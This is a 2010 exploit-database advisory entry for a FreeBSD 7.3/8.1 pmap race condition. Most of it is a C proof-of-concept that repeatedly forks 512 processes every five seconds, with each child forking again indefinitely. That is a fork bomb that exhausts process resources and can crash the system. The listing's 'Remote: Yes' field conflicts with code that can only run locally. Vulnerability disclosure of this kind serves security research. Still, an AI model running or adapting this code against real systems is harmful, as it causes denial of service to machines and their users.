FreeBSD 7.3/8.1 pmap race condition PoC

Published: 2010.09.06
Credit: Maksymilian Arciemowicz
Risk: High
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

/*
FreeBSD 7.3/8.1 pmap race condition PoC
Credit: Maksymilian Arciemowicz
*/
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Runs in each child: fork, sleep for a day, then repeat. */
void newproc(){
again:
    fork();
    sleep(3600*24);
    goto again;
}

/* Fork once; the parent returns, the child enters newproc(). */
void runfork(){
    pid_t adr;
    if(0!=(adr=fork())) printf("fork not zero\n");
    else {
        printf("fork zero\n");
        newproc();
    }
}

int main(){

    int secdel=5;
    int dev;

    // loop with a period of (int)secdel seconds
    while(1){
        printf("sleep %i sec\n",secdel);
        sleep(secdel);
        printf("weak up\n");

        // create 512 processes
        dev=512;
        while(dev--)
            runfork();
    }
    return 0;
}

References:

http://cxsecurity.com/issue/WLB-2010090156



Copyright 2017, cxsecurity.com